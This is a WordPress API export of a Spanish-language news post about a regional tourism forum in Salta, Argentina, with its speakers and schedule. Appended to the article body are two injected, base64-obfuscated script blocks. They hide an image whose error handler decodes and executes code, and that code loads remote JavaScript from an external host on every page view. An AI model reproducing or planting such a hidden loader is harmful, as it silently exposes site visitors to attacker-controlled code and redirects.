{"id":2995,"date":"2023-08-15T12:19:59","date_gmt":"2023-08-15T15:19:59","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2995"},"modified":"2025-08-14T00:10:22","modified_gmt":"2025-08-14T03:10:22","slug":"salta-sera-sede-del-foro-regional-de-turismo-del-norte","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2995","title":{"rendered":"Salta ser\u00e1 sede del Foro Regional de Turismo del Norte"},"content":{"rendered":"\n<h5 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#ab0730\"><em>Los sectores p\u00fablicos y privados de las seis provincias del Norte argentino analizar\u00e1n experiencias que apunten al crecimiento en mercados internacionales, para los que fueron convocados especialistas nacionales e internacionales. La jornada con acceso libre, ser\u00e1 el 5 de septiembre en el Centro de Convenciones Salta.<\/em><\/h5>\n\n\n\n<p>El pr\u00f3ximo 5 de septiembre en el Centro de Convenciones de Salta, se llevar\u00e1 a cabo el Primer Foro Regional de Turismo del Norte, con el objetivo de articular el trabajo que profundice el posicionamiento en mercados internacionales de la marca Norte y promueva el desarrollo de experiencias sustentables.<\/p>\n\n\n\n<p>Para las ponencias, se destacar\u00e1 la presencia de&nbsp;<strong>Mario Pergolini<\/strong>&nbsp;quien es responsable de exitosos casos de Comunicaci\u00f3n y Marketing Digital que pueden ser tomados por la actividad tur\u00edstica; en la misma l\u00ednea estar\u00e1 el consultor de la Organizaci\u00f3n Mundial de Turismo,&nbsp;<strong>V\u00edctor Chal\u00e9<\/strong>&nbsp;para contar sobre el Mundo Maya. Tambi\u00e9n estar\u00e1 en Salta&nbsp;<strong>Magdalena Aicega<\/strong>, ex integrante de Las Leonas, con una din\u00e1mica que potencia el trabajo en equipo.<\/p>\n\n\n\n<p>El evento, convocar\u00e1 a prestigiosos profesionales de nivel nacional e internacional para trabajar diversas tem\u00e1ticas vinculadas al desarrollo de experiencias tur\u00edsticas sostenibles de gesti\u00f3n integrada, posicionamiento e internacionalizaci\u00f3n regional para su crecimiento.<\/p>\n\n\n\n<p>Adem\u00e1s, de fortalecer las capacidades provinciales y municipales relacionadas con la integraci\u00f3n regional p\u00fablico\/privada en materia de desarrollo y promoci\u00f3n tur\u00edstica, servir\u00e1 para presentar herramientas, acciones y casos de \u00e9xito para potenciar el turismo regional a trav\u00e9s de charlas, paneles y din\u00e1micas vinculadas que promuevan el intercambio entre participantes, expertos y el ecosistema tur\u00edstico.<\/p>\n\n\n\n<p>\u00a0La participaci\u00f3n es gratuita y est\u00e1 destinada a profesionales de la industria tur\u00edstica, actores p\u00fablicos y privados, emprendedores, referentes empresariales y estudiantes. Por inscripciones en el siguiente link\u00a0<a href=\"https:\/\/fororegionalnorte.gob.ar\/\" target=\"_blank\" rel=\"noopener\" title=\"\">https:\/\/fororegionalnorte.gob.ar\/<\/a><\/p>\n\n\n\n<p>&nbsp;\u201cSer\u00e1 un honor recibir a colegas de la regi\u00f3n, profesionales, emprendedores, empresarios y especialistas de todo el pa\u00eds para tomar herramientas que el Norte argentino debe asumir en pos del crecimiento en los distintos mercados internacionales. A trav\u00e9s de casos exitosos y experiencias, podemos potenciar lo que tenemos para ofrecer al mundo\u201d, afirm\u00f3 el ministro de Turismo y Deportes de Salta,&nbsp;<strong>Mario Pe\u00f1a<\/strong>.<\/p>\n\n\n\n<p><strong>El programa<\/strong><\/p>\n\n\n\n<p>09.00 a 09.15 Saludo de bienvenida cargo de autoridades del Ente Norte<\/p>\n\n\n\n<p>09.15 a 10.00 El contexto actual del turismo en Argentina. Proyecci\u00f3n Internacional. Panel de Presidentes Regiones Tur\u00edsticas de Argentina.<\/p>\n\n\n\n<p>10.00 a 10.20 Panel con operadores receptivos<\/p>\n\n\n\n<p>10.20 a 10.40 Experiencia de articulaci\u00f3n integrada para el desarrollo e internacionalizaci\u00f3n de los destinos. Caso Mundo Maya. V\u00edctor Chal\u00e9. Consultor OMT. M\u00e9xico<\/p>\n\n\n\n<p>11.10 a 12.10 La M\u00fasica de las Ideas. Creatividad aplicada al dise\u00f1o de experiencias tur\u00edsticas sostenibles. Dr. Sergio Feferovich<\/p>\n\n\n\n<p>12.10 a 12.40 APERTURA OFICIAL<\/p>\n\n\n\n<p>12.40 a 13.40 Construyendo Futuro. Espacio de motivaci\u00f3n para el trabajo en equipo. Magui Aicega. Ex capitana de las Leonas<\/p>\n\n\n\n<p>13.40 a 15.00 CORTE. ALMUERZO LIBRE<\/p>\n\n\n\n<p>15.00 a 16.30 \u201cDise\u00f1os Inteligentes\u201d para el desarrollo, posicionamiento e internacionalizaci\u00f3n de Experiencias Tur\u00edsticas Sostenibles de gesti\u00f3n integrada. \u2022 V\u00edctor Chal\u00e9. M\u00e9xico. Consultor de la OMT<\/p>\n\n\n\n<p>TALLER Dise\u00f1o de Experiencias Tur\u00edsticas inteligentes, Sostenibles<\/p>\n\n\n\n<p>16.30 a 17.30 Comunicaci\u00f3n y Marketing Digital para el Turismo, sector p\u00fablico y privado a cargo del reconocido productor, periodista y empresario Mario Pergolini<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/salta-sera-sede-del-foro-regional-de-turismo-del-norte-91240\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretaria de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Los sectores p\u00fablicos y privados de las seis provincias del Norte argentino analizar\u00e1n experiencias que apunten al crecimiento en mercados internacionales, para los que fueron convocados especialistas nacionales e internacionales. La jornada con acceso libre, ser\u00e1 el 5 de septiembre en el Centro de Convenciones Salta. El pr\u00f3ximo 5 de septiembre en el Centro de [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2996,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[8,16],"tags":[],"class_list":{"0":"post-2995","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-eventos","8":"category-ferias-y-congresos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2995"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2995"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2995\/revisions"}],"predecessor-version":[{"id":6991,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2995\/revisions\/6991"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2996"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2995"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2995"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2995"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}